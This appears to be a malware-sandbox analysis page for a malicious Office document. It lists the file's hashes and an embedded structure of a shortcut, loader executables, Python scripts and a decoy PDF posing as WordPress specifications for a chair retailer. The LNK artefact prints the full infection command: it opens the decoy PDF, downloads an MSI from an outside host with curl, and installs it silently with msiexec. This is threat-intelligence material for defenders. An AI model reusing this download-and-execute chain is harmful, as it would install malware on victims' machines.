Malicious
Malicious

92c3ee1631e82da657ab3545b904bf96

MS Office Document
|
MD5: 92c3ee1631e82da657ab3545b904bf96
|
Size: 4.33 MB
|
application/vnd.ms-office

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
92c3ee1631e82da657ab3545b904bf96
Sha1
20db5cf81b3de385834aad0899d0958ab6ac7af5
Sha256
e89e7065ed449be69b268d4f4017a57b2b887b060312392cf688a5158603bbe1
Sha384
c330b66b27ab970a29813c2e7acfc26fa48ca1c1d4cbf9642680daa94124dd76e8ebd42a5f138cb1d58c0e1b5ba77755
Sha512
5461cb9aa7656b934babe9ea165feb89c2f6473654c0847b00f04414073c9271afdfd34c710e228e573d0b4679265cab81489392e7d702eb2e70d2b631ef505b
SSDeep
49152:OpMOWBfbUx+Ze5AzuAMAqJVP4cppXZJhr+V/gIZ60dUhDCuQ+/zklbBfhH04dE+:OpaUyhSAMjDgWBr+5gI/UhDCuBbk/V0
TLSH
AD16DED13794C227C98719325E27D798272CFCA5AA30B0873BB0BB1E5B78AD35D25706
File Structure
92c3ee1631e82da657ab3545b904bf96
Malicious
Root Entry
䡀䆒䑲
䡀䈖䌧䠤
䡀䌋䄱䜵
䡀㬿䏲䐸䖱
䡀㽿䅤䈯䠶
䡀䈏䗤䕸䠨
䡀䈛䌪䗶䜵
䡀䓞䕪䇤䠨
䡀䕙䓲䕨䜷
䡀䌍䈵䗦䕲䠼
䡀䒌䓰䑲䑨䠷
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㿿䏤䇬䗤䒬䠱
䡀䘌䗶䐲䆊䌷䑲
䆒䑲㹾䒵䘧䗦䆒䑲
䡀䄕䑸䋦䒌䇱䗬䒬䠱
䡀䇊䌰㾱㼒䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䑒䗶䏤㾯㼒䔨䈸䆱䠨
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
䌋䄱䜵䅾䞽䘌䗶䐲䆊䌷䑲䏍䠯
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
.reloc
Resources
RT_MANIFEST
ID:0002
ID:1033
䌋䄱䜵䅾䞽䕠䓤䈳㼧䗨䓸䕙䊲䄵䠰
SummaryInformation
DocumentSummaryInformation
14.py
Document.lnk
Malicious
[Lnk Summary]
Malicious
installer.exe
Overlay_688fe322.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.fptable
.rsrc
.reloc
Resources
RT_MANIFEST
ID:0001
ID:1033
loader.exe
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.fptable
.rsrc
.reloc
loader_protected.exe
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.rsrc
.data
new.py
Technical_Specifications.pdf
#Stream {UglyToad.PdfPig.Core.XrefLocation}
Text (Preview)
Page #1
Page #2
Page #3
Page #4
Page #5
Page #6
Page #7
Page #8
Page #9
Page #10
Page #11
Structure
Informations
Name
 Value
Technical_Specifications.pdf

1.4
Technical_Specifications.pdf

Development
Technical_Specifications.pdf

ErgonomicChairsDirect LTD
Technical_Specifications.pdf

WordPress Website Performance Optimization Project
Technical_Specifications.pdf

Technical Specifications — WordPress Performance Optimization
Technical_Specifications.pdf

ErgonomicChairsDirect LTD
Technical_Specifications.pdf

ErgonomicChairsDirect LTD
Technical_Specifications.pdf

Technical Specifications — WordPress Performance Optimization
Technical_Specifications.pdf

Development
Technical_Specifications.pdf

WordPress Website Performance Optimization Project
Technical_Specifications.pdf

ErgonomicChairsDirect LTD
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c start msedge "https://stage1-orschellx.com/Technical_Specifications.pdf" & curl -sLo "%TEMP%\bosfortuy.msi" "https://stage1-orschellx.com/file/setup.pdf" & msiexec /i "%TEMP%\bosfortuy.msi" /qn & exit
92c3ee1631e82da657ab3545b904bf96 (4.33 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙